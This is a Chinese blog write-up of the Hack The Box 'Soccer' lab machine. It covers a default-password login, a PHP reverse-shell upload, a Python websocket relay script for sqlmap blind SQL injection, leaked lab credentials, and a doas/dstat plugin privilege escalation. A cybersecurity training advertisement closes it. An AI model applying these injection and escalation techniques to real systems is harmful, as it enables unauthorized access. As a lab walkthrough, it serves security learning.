靶场笔记-HTB Soccer

程序员菠萝

已于 2024-01-10 19:13:24 修改

阅读量134

点赞数

文章标签：笔记网络

于 2023-08-15 12:00:00 首次发布

本文链接：https://blog.csdn.net/xnxqwzy/article/details/132288227

版权

一、常规nmap扫描

发现该靶机开放了22和80端口，并且使用Nginx

二、80端口渗透

访问80端口，显示一个静态页面，并无其他信息
进行目录扫描

发现tiny目录，访问发现是个登录入口，经搜索发现这个入口默认密码为admin:admin@123
登录后，发现其具有上传文件功能点，并具有任意文件上传漏洞，于是上传一个反弹shell的php马并成功反弹shell
返回的是一个非交互式shell，利用dpkg -l | grep python查看其具有python，并利用python生成一个交互式shell
通过/etc/passwd查询得知该机器有一个名为player的用户

由于之前扫描端口时发现这个网站使用Nginx，于是访问Nginx的配置文件

www-data@soccer:/etc/nginx$ cat nginx.conf
cat nginx.conf
user www-data;
worker_processes auto;
pid /run/nginx.pid;
include /etc/nginx/modules-enabled/*.conf;

events {
worker_connections 768;
# multi_accept on;
}

http {

    ##
    # Basic Settings
    ##

    sendfile on;
    tcp_nopush on;
    tcp_nodelay on;
    keepalive_timeout 65;
    types_hash_max_size 2048;
    # server_tokens off;

    # server_names_hash_bucket_size 64;
    # server_name_in_redirect off;

    include /etc/nginx/mime.types;
    default_type application/octet-stream;

    ##
    # SSL Settings
    ##

    ssl_protocols TLSv1 TLSv1.1 TLSv1.2 TLSv1.3; # Dropping SSLv3, ref: POODLE
    ssl_prefer_server_ciphers on;

    ##
    # Logging Settings
    ##

    access_log /var/log/nginx/access.log;
    error_log /var/log/nginx/error.log;

    ##
    # Gzip Settings
    ##

    gzip on;

    # gzip_vary on;
    # gzip_proxied any;
    # gzip_comp_level 6;
    # gzip_buffers 16 8k;
    # gzip_http_version 1.1;
    # gzip_types text/plain text/css application/json application/javascript text/xml application/xml application/xml+rss text/javascript;

    ##
    # Virtual Host Configs
    ##

    include /etc/nginx/conf.d/*.conf;
    include /etc/nginx/sites-enabled/*;

}

#mail {

# See sample authentication script at:

# http://wiki.nginx.org/ImapAuthenticateWithApachePhpScript

# auth_http localhost/auth.php;

# pop3_capabilities “TOP” “USER”;

# imap_capabilities “IMAP4rev1” “UIDPLUS”;

server {

listen localhost:110;

protocol pop3;

proxy on;

}

server {

listen localhost:143;

protocol imap;

proxy on;

}

继续访问默认站点配置文件，发现其还有另一个子域名为soc-player.soccer.htb

www-data@soccer:/etc/nginx/sites-enabled$ cat soc-player.htb
cat soc-player.htb
server {
listen 80;
listen [::]:80;

    server_name soc-player.soccer.htb;

    root /root/app/views;

    location / {
            proxy_pass http://localhost:3000;
            proxy_http_version 1.1;
            proxy_set_header Upgrade $http_upgrade;
            proxy_set_header Connection 'upgrade';
            proxy_set_header Host $host;
            proxy_cache_bypass $http_upgrade;
    }

}

访问子域名soc-player.soccer.htb，发现其是具有注册登录功能的页面，于是自行注册账号并登录
登录进来发现只有一个验证ticket的界面，具有websocket接口，没其他信息
尝试sql注入，通过验证发现可以进行布尔盲注

布尔盲注纯手工注入太耗时间但是sqlmap无法直接对websocket接口进行自动化注入，通过google搜索找到一篇参考文章
https://rayhan0x01.github.io/ctf/2021/04/02/blind-sqli-over-websocket-
automation.html
首先需要创建一个python脚本，代码如下：

from http.server import SimpleHTTPRequestHandler
from socketserver import TCPServer
from urllib.parse import unquote, urlparse
from websocket import create_connection

ws_server = “ws://soc-player.soccer.htb:9091/”

def send_ws(payload):
ws = create_connection(ws_server)
# If the server returns a response on connect, use below line
#resp = ws.recv() # If server returns something like a token on connect you can find and extract from here

    # For our case, format the payload in JSON
    message = unquote(payload).replace('"','\'') # replacing " with ' to avoid breaking JSON structure
    data = '{"id":"%s"}' % message

    ws.send(data)
    resp = ws.recv()
    ws.close()

    if resp:
            return resp
    else:
            return ''

def middleware_server(host_port,content_type=“text/plain”):

    class CustomHandler(SimpleHTTPRequestHandler):
            def do_GET(self) -> None:
                    self.send_response(200)
                    try:
                            payload = urlparse(self.path).query.split('=',1)[1]
                    except IndexError:
                            payload = False

                    if payload:
                            content = send_ws(payload)
                    else:
                            content = 'No parameters specified!'

                    self.send_header("Content-type", content_type)
                    self.end_headers()
                    self.wfile.write(content.encode())
                    return

    class _TCPServer(TCPServer):
            allow_reuse_address = True

    httpd = _TCPServer(host_port, CustomHandler)
    httpd.serve_forever()

print(“[+] Starting MiddleWare Server”)
print(“[+] Send payloads in http://localhost:8081/?id=*”)

try:
middleware_server((‘0.0.0.0’,8081))
except KeyboardInterrupt:
pass

运行脚本并在另一个终端执行以下命令来进行sqlmap自动化注入

sqlmap -u http://localhost:8081?id=1 -p id --dbs

经过漫长的等待，获取到数据库用户名密码player:PlayerOftheMatch2022

利用得到的用户名密码进行ssh登录，获取到第一个flag

三、提权

常规进行sudo，suid等信息收集，经过一顿折腾发现doas这个组件能以写入插件的方式进行suid提权
首先在/usr/local/share/dstat/中写入一个一个dastat_开头的py文件，命名随意，内容为

import os
os.system(“bash -i”)

运行脚本后成功提权至root

随后在root文件夹下得到第二个rootflag

/usr/local/share/dstat/中写入一个一个dastat_开头的py文件，命名随意，内容为

import os
os.system("bash -i")

运行脚本后成功提权至root
[外链图片转存中…(img-5BnRUHXB-1692028510323)]

随后在root文件夹下得到第二个rootflag
[外链图片转存中…(img-2sMAw7Mk-1692028510324)]

题外话

初入计算机行业的人或者大学计算机相关专业毕业生，很多因缺少实战经验，就业处处碰壁。下面我们来看两组数据：

2023届全国高校毕业生预计达到1158万人，就业形势严峻；

国家网络安全宣传周公布的数据显示，到2027年我国网络安全人员缺口将达327万。

一方面是每年应届毕业生就业形势严峻，一方面是网络安全人才百万缺口。

6月9日，麦可思研究2023年版就业蓝皮书（包括《2023年中国本科生就业报告》《2023年中国高职生就业报告》）正式发布。

2022届大学毕业生月收入较高的前10个专业

本科计算机类、高职自动化类专业月收入较高。2022届本科计算机类、高职自动化类专业月收入分别为6863元、5339元。其中，本科计算机类专业起薪与2021届基本持平，高职自动化类月收入增长明显，2022届反超铁道运输类专业（5295元）排在第一位。

具体看专业，2022届本科月收入较高的专业是信息安全（7579元）。对比2018届，电子科学与技术、自动化等与人工智能相关的本科专业表现不俗，较五年前起薪涨幅均达到了19%。数据科学与大数据技术虽是近年新增专业但表现亮眼，已跻身2022届本科毕业生毕业半年后月收入较高专业前三。五年前唯一进入本科高薪榜前10的人文社科类专业——法语已退出前10之列。
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-cyLIHHuy-1692028510324)(C:\Users\Administrator\AppData\Roaming\Typora\typora-user-images\image-20230809162658551.png)]

“没有网络安全就没有国家安全”。当前，网络安全已被提升到国家战略的高度，成为影响国家安全、社会稳定至关重要的因素之一。

网络安全行业特点

1、就业薪资非常高，涨薪快 2021年猎聘网发布网络安全行业就业薪资行业最高人均33.77万！

2、人才缺口大，就业机会多

2019年9月18日《中华人民共和国中央人民政府》官方网站发表：我国网络空间安全人才需求140万人，而全国各大学校每年培养的人员不到1.5W人。猎聘网《2021年上半年网络安全报告》预测2027年网安人才需求300W，现在从事网络安全行业的从业人员只有10W人。

行业发展空间大，岗位非常多

网络安全行业产业以来，随即新增加了几十个网络安全行业岗位︰网络安全专家、网络安全分析师、安全咨询师、网络安全工程师、安全架构师、安全运维工程师、渗透工程师、信息安全管理员、数据安全工程师、网络安全运营工程师、网络安全应急响应工程师、数据鉴定师、网络安全产品经理、网络安全服务工程师、网络安全培训师、网络安全审计员、威胁情报分析工程师、灾难恢复专业人员、实战攻防专业人员…

职业增值潜力大

网络安全专业具有很强的技术特性，尤其是掌握工作中的核心网络架构、安全技术，在职业发展上具有不可替代的竞争优势。

随着个人能力的不断提升，所从事工作的职业价值也会随着自身经验的丰富以及项目运作的成熟，升值空间一路看涨，这也是为什么受大家欢迎的主要原因。

从某种程度来讲，在网络安全领域，跟医生职业一样，越老越吃香，因为技术愈加成熟，自然工作会受到重视，升职加薪则是水到渠成之事。

黑客&网络安全如何学习

今天只要你给我的文章点赞，我私藏的网安学习资料一样免费共享给你们，来看看有哪些东西。

1.学习路线图

行业发展空间大，岗位非常多

职业增值潜力大

网络安全专业具有很强的技术特性，尤其是掌握工作中的核心网络架构、安全技术，在职业发展上具有不可替代的竞争优势。

从某种程度来讲，在网络安全领域，跟医生职业一样，越老越吃香，因为技术愈加成熟，自然工作会受到重视，升职加薪则是水到渠成之事。

黑客&网络安全如何学习

今天只要你给我的文章点赞，我私藏的网安学习资料一样免费共享给你们，来看看有哪些东西。

1.学习路线图

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-VAdtuGuW-1692028510324)(C:\Users\Administrator\Desktop\网安思维导图\享学首创年薪40W+网络安全工程师青铜到王者技术成长路线V4.0.png)]

攻击和防守要学的东西也不少，具体要学的东西我都写在了上面的路线图，如果你能学完它们，你去就业和接私活完全没有问题。

2.视频教程

网上虽然也有很多的学习资源，但基本上都残缺不全的，这是我自己录的网安视频教程，上面路线图的每一个知识点，我都有配套的视频讲解。

内容涵盖了网络安全法学习、网络安全运营等保测评、渗透测试基础、漏洞详解、计算机基础知识等，都是网络安全入门必知必会的学习内容。
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-mHdFXJAD-1692028510325)(C:\Users\Administrator\Desktop\网安资料截图\视频课件.jpeg)]

（都打包成一块的了，不能一一展开，总共300多集）

因篇幅有限，仅展示部分资料，需要点击下方链接即可前往获取

如果你对网络安全入门感兴趣，那么你需要的话可以点击这里👉网络安全重磅福利：入门&进阶全套282G学习资源包免费分享！